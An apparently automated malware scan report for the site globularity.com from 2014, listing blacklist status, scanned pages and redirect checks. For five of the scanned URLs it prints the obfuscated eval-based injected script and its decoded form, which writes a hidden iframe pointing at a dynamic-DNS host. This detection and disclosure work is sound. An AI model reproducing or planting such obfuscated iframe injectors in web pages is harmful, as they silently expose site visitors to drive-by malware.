Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=globularity.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://globularity.com/ | 200 OK Content-Length: 8278 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) v="va"+"l";try{ebgserb++;}catch(snregrx){try{(Math+"")()}catch(ztbet){m=Math;ev=window[""+"e"+v];} n="25&&26&&121&&119&&48&&57&&116&&128&&115&&134&&125&&118&&126&&133&&62&&120&&117&&133&&85&&125&&117&&126&&117&&127&&132&&132&&82&&138&&100&&114&&119&&am Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://dwinsm.dynamicdns.org.uk/stats/ga.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://dwinsm.dynamicdns.org.uk/stats/ga.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttr <iframe src='http://dwinsm.dynamicdns.org.uk/stats/ga.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19470 Content-Type: text/javascript | clean |
http://globularity.com/page/links.html | 200 OK Content-Length: 4865 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) v="va"+"l";try{ebgserb++;}catch(snregrx){try{(Math+"")()}catch(ztbet){m=Math;ev=window[""+"e"+v];} n="25&&26&&121&&119&&48&&57&&116&&128&&115&&134&&125&&118&&126&&133&&62&&120&&117&&133&&85&&125&&117&&126&&117&&127&&132&&132&&82&&138&&100&&114&&119&&am Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://dwinsm.dynamicdns.org.uk/stats/ga.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://dwinsm.dynamicdns.org.uk/stats/ga.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttr <iframe src='http://dwinsm.dynamicdns.org.uk/stats/ga.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://globularity.com/page/sitemap.html | 200 OK Content-Length: 5803 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) v="va"+"l";try{ebgserb++;}catch(snregrx){try{(Math+"")()}catch(ztbet){m=Math;ev=window[""+"e"+v];} n="25&&26&&121&&119&&48&&57&&116&&128&&115&&134&&125&&118&&126&&133&&62&&120&&117&&133&&85&&125&&117&&126&&117&&127&&132&&132&&82&&138&&100&&114&&119&&am Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://dwinsm.dynamicdns.org.uk/stats/ga.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://dwinsm.dynamicdns.org.uk/stats/ga.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttr <iframe src='http://dwinsm.dynamicdns.org.uk/stats/ga.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://globularity.com/page/sitemap/xml | 200 OK Content-Length: 3494 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) v="va"+"l";try{ebgserb++;}catch(snregrx){try{(Math+"")()}catch(ztbet){m=Math;ev=window[""+"e"+v];} n="25&&26&&121&&119&&48&&57&&116&&128&&115&&134&&125&&118&&126&&133&&62&&120&&117&&133&&85&&125&&117&&126&&117&&127&&132&&132&&82&&138&&100&&114&&119&&am Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://dwinsm.dynamicdns.org.uk/stats/ga.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://dwinsm.dynamicdns.org.uk/stats/ga.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttr <iframe src='http://dwinsm.dynamicdns.org.uk/stats/ga.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://globularity.com/test404page.js | 200 OK Content-Length: 8278 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) v="va"+"l";try{ebgserb++;}catch(snregrx){try{(Math+"")()}catch(ztbet){m=Math;ev=window[""+"e"+v];} n="25&&26&&121&&119&&48&&57&&116&&128&&115&&134&&125&&118&&126&&133&&62&&120&&117&&133&&85&&125&&117&&126&&117&&127&&132&&132&&82&&138&&100&&114&&119&&am Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://dwinsm.dynamicdns.org.uk/stats/ga.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://dwinsm.dynamicdns.org.uk/stats/ga.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttr <iframe src='http://dwinsm.dynamicdns.org.uk/stats/ga.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: globularity.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 21:08:46 GMT
Server: Apache
Content-Type: text/html
GET / HTTP/1.1
Host: globularity.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 21:08:46 GMT
Server: Apache
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: globularity.com
Referer: http://www.google.com/search?q=globularity.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: globularity.com
Referer: http://www.google.com/search?q=globularity.com
Result:
The result is similar to the first query. There are no suspicious redirects found.